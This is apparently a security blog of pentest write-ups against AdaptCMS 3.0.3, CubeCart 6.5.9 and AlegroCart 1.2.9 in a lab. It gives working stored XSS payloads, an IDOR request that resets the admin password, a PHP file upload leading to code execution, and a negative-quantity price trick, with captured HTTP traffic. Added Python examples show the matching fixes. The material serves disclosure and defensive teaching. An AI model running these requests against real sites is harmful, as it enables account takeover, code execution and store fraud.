Sunday, 22 June 2025

Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description

- It was noted that the application's file upload functionality allowed SVG files to be uploaded, resulting in Stored XSS


Stored XSS via File Upload #1:

Steps to Reproduce:

  1. Login as a low-privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
  2. Click "Choose File" and upload the following file


html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>


// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>     <div class="clearfix"></div>
[...]
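The upload above is accepted because the server trusts the client-supplied file name and Content-Type and stores the file under a URL path where the browser will render it as a document. The following is an added example (not AdaptCMS code) of how an avatar endpoint can decide on the bytes rather than the headers: allowlist the extension, sniff the raster signature, reject anything that is not an image (HTML and SVG both fail that check), store under a server-generated name, and serve with headers that stop the browser from treating the file as a page. The function names, size limit and the sample inputs are assumptions constructed for the example.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

# Leading bytes of the raster formats an avatar endpoint should accept.
IMAGE_SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MAX_AVATAR_BYTES = 2 * 1024 * 1024   # assumed limit for the example


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: str = ""   # server-generated name, set only when accepted


def sniff_image_type(data: bytes) -> Optional[str]:
    """Classify the upload by its leading bytes, ignoring what the client claims."""
    for kind, signature in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return kind
    return None


def validate_avatar(filename: str, declared_type: str, data: bytes) -> UploadDecision:
    """Decide whether an uploaded avatar may be stored.

    `filename` and `declared_type` come from the multipart part headers and are
    attacker-controlled; they are checked but never decide the outcome alone.
    """
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        return UploadDecision(False, f"extension {ext!r} is not an allowed image type")
    if not declared_type.startswith("image/"):
        return UploadDecision(False, f"declared Content-Type {declared_type!r} is not an image")
    if len(data) > MAX_AVATAR_BYTES:
        return UploadDecision(False, "file exceeds the avatar size limit")
    kind = sniff_image_type(data)
    if kind is None:
        # HTML or SVG bytes land here: neither carries a raster signature.
        return UploadDecision(False, "content is not a recognised raster image")
    if ("jpg" if ext == "jpeg" else ext) != kind:
        return UploadDecision(False, f"extension {ext!r} does not match content type {kind!r}")
    # Never reuse the client's name on disk or in a URL; generate one instead.
    return UploadDecision(True, "ok", f"{secrets.token_hex(16)}.{kind}")


def avatar_response_headers(kind: str) -> Dict[str, str]:
    """Headers for serving a stored avatar so the browser treats it as data, not a document."""
    content_types = {"png": "image/png", "jpg": "image/jpeg", "gif": "image/gif"}
    return {
        "Content-Type": content_types[kind],
        "X-Content-Type-Options": "nosniff",
        # A script-free sandboxed policy limits damage if something slips past validation.
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Content-Disposition": f'inline; filename="avatar.{kind}"',
    }


# Constructed sample inputs for the example (not captures from any target).
HTML_UPLOAD = b'<!DOCTYPE html><html><body onload="alert(1)"></body></html>'
PNG_UPLOAD = IMAGE_SIGNATURES["png"] + b"\x00" * 32   # header only; enough for the signature check
JPG_UPLOAD = IMAGE_SIGNATURES["jpg"] + b"\x00" * 32


if __name__ == "__main__":
    print(validate_avatar("html-xss.html", "text/html", HTML_UPLOAD))
    print(validate_avatar("avatar.png", "image/png", HTML_UPLOAD))
    print(validate_avatar("avatar.png", "image/png", PNG_UPLOAD))
```

The signature check is deliberately shallow; a real service would additionally decode and re-encode the image with an imaging library so that only pixel data survives. Serving uploads from a separate origin is the other common mitigation, since even a stored HTML file cannot then read the application's session.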

Friday Fun Pentest Series - 28 - IDOR "Change Password" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to IDOR in the password change functionality, resulting in a low-privilege user being able to change the "admin" password


IDOR "Change Password" Functionality #1:

Steps to Reproduce:
  1. Login as a user with low privilege and visit the profile page
  2. Select "Edit Your Profile" and click "Submit"
  3. Trap the HTTP POST request
  4. Set the "data[User][password]" and "data[User][password_confirm]" values to "Passw0rd!"
  5. Set the "data[User][id]" value to "1"
  6. This changes the password of the "admin" account

// HTTP POST request changing password

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]

[...]
4d63437ebea6a2ef6648b29cc1c43ea70600295a
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password]"

Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password_confirm]"

Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][email]"

privesc-test@test.test
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][id]"

1
------WebKitFormBoundaryDvhxmc78yz9KfFbn
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 19:56:17 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 13925
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP POST request logging in with admin account

POST /adaptcms/login HTTP/1.1
Host: 192.168.58.131
Content-Length: 262
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.131
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]

_method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]=


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 19:56:33 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly
Location: http://192.168.58.131/adaptcms/admin
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Friday Fun Pentest Series - 27 - Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to Stored XSS in the "send message" functionality


Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:
  1. Login as a normal user and visit "Profile" > "Message" > "Send Message"
  2. In the "Message" field enter the following payload "<form action="javascript:alert(1)"><input id="x" type="submit" /></form><label for="x">XSS</label>"
  3. The payload executes when the message is viewed

// HTTP POST request sending message

POST /adaptcms/messages/send HTTP/1.1
Host: 192.168.58.131
Content-Length: 591
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.131
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]

_method=POST&data[_Token][key]=aabf09c7e75b47229d84deadd98c6ab65e87f979&data[Message][recipient]=admin&data[Message][title]=test&data[Message][message]=<form action="javascript:alert(1)"><input id="x" type="submit" /></form>
<p><label for="x">XSS</label></p>&data[Message][parent_id]=0&data[Message][receiver_user_id]=1&data[_Token][fields]=a989058dd1dcaad53b324c3233dfc1e8f20ba411%3AMessage.parent_id%7CMessage.receiver_user_id&data[_Token][unlocked]=


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 19:01:10 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/messages/index/outbox
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8



Friday Fun Pentest Series - 26 - Authenticated File Upload to RCE - adaptcmsv3.0.3

Description

- It was noted that the application's file upload functionality was vulnerable to unrestricted file upload, resulting in RCE via a webshell upload


Authenticated File Upload to RCE #1:

Steps to Reproduce:

  1. Login as the admin user, visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
  2. Select "Add File". In the "File Contents" field add the following payload "<?php phpinfo(); ?>"
  3. Set "File Extension" to "php" and "Folder Location" to "Images"
  4. Once uploaded, the file is available under the "img" directory

// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream

------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"

<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"

php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"

test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"

img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP Request triggering the webshell

GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


// HTTP Response triggering the webshell

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
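The theme asset editor writes `data[Asset][content]` into the web root under a name built from `data[Asset][file_name]`, `data[Asset][file_extension]` and `data[Asset][folder]`, and nothing stops the extension from being one the web server hands to an interpreter. Below is an added example (not AdaptCMS code) of the checks such an editor needs before touching the filesystem: an extension allowlist with a separate guard for server-executable extensions, a dot-free base name, a folder allowlist, and a final confinement check on the resolved path. The web root path and the field names are assumptions taken from the request shape on this page.

```python
import posixpath
import re
from typing import Tuple

# What a theme asset editor legitimately needs to write into the web root.
ALLOWED_ASSET_EXTENSIONS = {"css", "js", "png", "jpg", "gif"}
ALLOWED_FOLDERS = {"css", "js", "img"}
# Extensions a typical PHP web server may hand to an interpreter. Kept as a second
# guard so that a later change to the allowlist cannot accidentally admit them.
SERVER_EXECUTABLE = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "phps", "htaccess", "cgi", "pl"}
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

WEBROOT = "/var/www/adaptcms/app/webroot"   # assumed deployment path for the example


def validate_theme_asset(file_name: str, file_extension: str, folder: str,
                         webroot: str = WEBROOT) -> Tuple[bool, str, str]:
    """Return (accepted, reason, absolute_path); the path is '' when rejected."""
    ext = file_extension.strip().lower().lstrip(".")
    if ext in SERVER_EXECUTABLE:
        return False, f"extension {ext!r} is server-executable", ""
    if ext not in ALLOWED_ASSET_EXTENSIONS:
        return False, f"extension {ext!r} is not an allowed asset type", ""
    # No dots in the base name: with Apache's AddHandler-style mapping a name such
    # as test.php.css can still be run as PHP, and dots are also what makes ".." possible.
    if not _SAFE_NAME.match(file_name):
        return False, "file name must contain only letters, digits, '_' or '-'", ""
    sub = posixpath.normpath(folder.strip().strip("/"))
    if sub not in ALLOWED_FOLDERS:
        return False, f"folder {folder!r} is not one of {sorted(ALLOWED_FOLDERS)}", ""
    path = posixpath.join(webroot, sub, f"{file_name}.{ext}")
    # Belt and braces: the final path must still sit under the web root.
    if posixpath.commonpath([webroot, path]) != webroot:
        return False, "resolved path escapes the web root", ""
    return True, "ok", path


if __name__ == "__main__":
    # The request on this page: name "test", extension "php", folder "img/".
    print(validate_theme_asset("test", "php", "img/"))
    print(validate_theme_asset("site", "css", "css"))
```

Validation alone is not the whole fix: the directories an editor may write to should also be served with script execution disabled (for Apache, a `php_flag engine off` or `SetHandler` override for `img/`, `css/` and `js/`), so that a bypass of the name check still yields a static file rather than code execution.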

Saturday, 24 May 2025

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description

- It was noted that the application was vulnerable to Stored Cross Site Scripting


Stored Cross Site Scripting #1:

Steps to Reproduce:

  1. Visit "Account" > "Address Book" and choose "Edit"
  2. In the "Description" parameter enter the following payload <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

// HTTP POST Request

POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...] 


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]


// HTTP GET Request

GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
[...]



// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div>
[...]

Wednesday, 30 April 2025

Friday Fun Pentest Series - 24 - Business Logic Flaw: Price Manipulation - alegrocartv1.2.9

Description

- The "quantity" parameter was vulnerable to a business logic flaw that affected the final price


Business Logic Flaw: Price Manipulation #1:

Steps to Reproduce:

  1. Visit the store and add a product
  2. Intercept the HTTP GET request and set the "quantity" parameter to a negative value

// HTTP GET request

GET /alegrocart/index.php?controller=addtocart&action=add&item=10&quantity=-100 HTTP/1.1
Host: 192.168.58.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
[...]


// HTTP response

HTTP/1.1 200 OK
Date: Thu, 03 Apr 2025 22:16:58 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
Expires: Thu, 03 Apr 2025 22:16:58 GMT
Vary: Accept-Encoding
Content-Length: 813
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div class="headingcolumn pointer" onclick="ShowCart()"><h3>Cart  ^</h3></div>
<div  class="cart">
<div id="cart_content" class="cart_content">
<div id="cart_products">
<table>
<tr>
<td>-100&nbsp;x&nbsp;</td>
<td class="ff"><a href="http://192.168.58.129/alegrocart/?controller=product&amp;product_id=10">Featured13/8&quot;&amp;1/2&quot;</a></td>
<td class="ee"> $-1,599.00</td>
</tr>
</table>
</div>
<div class="aa">Subtotal:$-1,599.00</div>
<div class="cc">1 Product(s) - <div class="dd">-100 Item(s)</div></div>
<div class="bb" id="cart_button"><a href="http://192.168.58.129/alegrocart/?controller=cart">View Cart</a></div>
[...]
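The response above shows the cart accepting `-100` and carrying the negative line total through to the subtotal. The following added example (not AlegroCart code) contrasts a cart handler that mirrors that behaviour with one that parses the quantity strictly as a small positive integer and caps the per-line total, then recomputes money server-side in `Decimal`. The catalogue with its single unit price is constructed so that the vulnerable path reproduces the `$-1,599.00` figure from the capture; the per-line limit is an assumption.

```python
import re
from decimal import Decimal, ROUND_HALF_UP
from typing import Callable, Dict

# Constructed catalogue: unit price chosen so that -100 units give the page's $-1,599.00 subtotal.
CATALOG: Dict[int, Decimal] = {10: Decimal("15.99")}
MAX_QTY_PER_LINE = 99                        # assumed business limit
_QTY = re.compile(r"^[1-9][0-9]{0,2}$")      # positive decimal integer: no sign, no spaces, no exponent


def vulnerable_add_to_cart(cart: Dict[int, int], item_id: int, quantity_param: str) -> Dict[int, int]:
    """Mirrors the flaw: the raw parameter is converted and added without any range check."""
    cart[item_id] = cart.get(item_id, 0) + int(quantity_param)
    return cart


def parse_quantity(raw: str) -> int:
    """Accept only 1..MAX_QTY_PER_LINE written as a plain positive integer."""
    if not _QTY.match(raw.strip()):
        raise ValueError(f"quantity {raw!r} is not a positive integer")
    qty = int(raw)
    if qty > MAX_QTY_PER_LINE:
        raise ValueError(f"quantity {qty} exceeds the per-line limit")
    return qty


def secure_add_to_cart(cart: Dict[int, int], item_id: int, quantity_param: str) -> Dict[int, int]:
    """Fixed variant: validate the item, the increment and the resulting line quantity."""
    if item_id not in CATALOG:
        raise KeyError(f"unknown item {item_id}")
    new_qty = cart.get(item_id, 0) + parse_quantity(quantity_param)
    if new_qty > MAX_QTY_PER_LINE:
        raise ValueError("line quantity limit exceeded")
    cart[item_id] = new_qty
    return cart


def cart_subtotal(cart: Dict[int, int]) -> Decimal:
    """Recompute the subtotal from catalogue prices; never trust a client-supplied total."""
    total = sum((CATALOG[i] * q for i, q in cart.items()), Decimal("0"))
    return total.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)


def add_outcome(add: Callable, cart: Dict[int, int], item_id: int, quantity_param: str) -> str:
    """Run an add-to-cart handler and report 'subtotal:<amount>' or the exception raised."""
    try:
        add(cart, item_id, quantity_param)
        return f"subtotal:{cart_subtotal(cart)}"
    except (ValueError, KeyError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print(add_outcome(vulnerable_add_to_cart, {}, 10, "-100"))   # subtotal:-1599.00
    print(add_outcome(secure_add_to_cart, {}, 10, "-100"))       # ValueError
```

A cheap detective control sits next to this: the checkout step should refuse any order whose subtotal, line total or quantity is not strictly positive, so that a bypass of the add-to-cart check cannot reach payment.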



Friday Fun Pentest Series - 23 - Stored XSS - alegrocartv1.2.9

Description

- The application lacked output encoding and as a result was vulnerable to Stored XSS


Stored XSS #1:

Steps to Reproduce:

  1. Login with the demonstrator account and visit "Customers" > "Newsletter"
  2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>
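The three stored XSS findings on this page (#27 in the AdaptCMS message body, #25 in the CubeCart address description and #23 in the AlegroCart newsletter) share one root cause: user-supplied text is written into an HTML body without encoding. None of the three payloads uses a `<script>` tag, which is why a tag blocklist is the wrong fix. The following added example (generic Python, not code from any of the three projects) runs the page's own payloads through a naive `<script>` stripper, which leaves all of them intact, and then through contextual HTML-body encoding, which neutralises all of them while preserving the text. The template fragment and helper names are constructed for the example.

```python
import html
import re

# The three payloads reported on this page, kept verbatim as test inputs.
PAYLOADS = {
    "adaptcms_message": '<form action="javascript:alert(1)"><input id="x" type="submit" /></form><label for="x">XSS</label>',
    "cubecart_address": '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">',
    "alegrocart_newsletter": '<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>',
}

_SCRIPT_TAG = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)
_TAG_START = re.compile(r"<[a-zA-Z/!?]")


def strip_script_tags(value: str) -> str:
    """Blocklist approach: remove <script> elements and nothing else."""
    return _SCRIPT_TAG.sub("", value)


def encode_for_html_body(value: str) -> str:
    """Contextual output encoding for text between HTML tags (also safe inside quoted attributes)."""
    return html.escape(value, quote=True)


def has_unescaped_tag(rendered: str) -> bool:
    """True if the string still contains something an HTML parser would treat as a tag start."""
    return _TAG_START.search(rendered) is not None


def render_message(sender: str, title: str, body: str) -> str:
    """Constructed inbox fragment: every user-controlled field passes through the encoder."""
    return (
        '<div class="message">'
        f"<h5>{encode_for_html_body(title)}</h5>"
        f'<span class="from">{encode_for_html_body(sender)}</span>'
        f"<p>{encode_for_html_body(body)}</p>"
        "</div>"
    )


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, "blocklist changed it:", strip_script_tags(payload) != payload)
        print(name, "encoded:", encode_for_html_body(payload))
```

`html.escape(s, quote=True)` is the Python equivalent of PHP's `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')`, which is the call these PHP applications would apply at output time. Encoding is context-specific: the same value placed into a JavaScript string, a URL or a CSS block needs that context's encoder, and a feature that must keep some markup (a rich-text newsletter) needs an allowlist-based HTML sanitiser rather than escaping.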
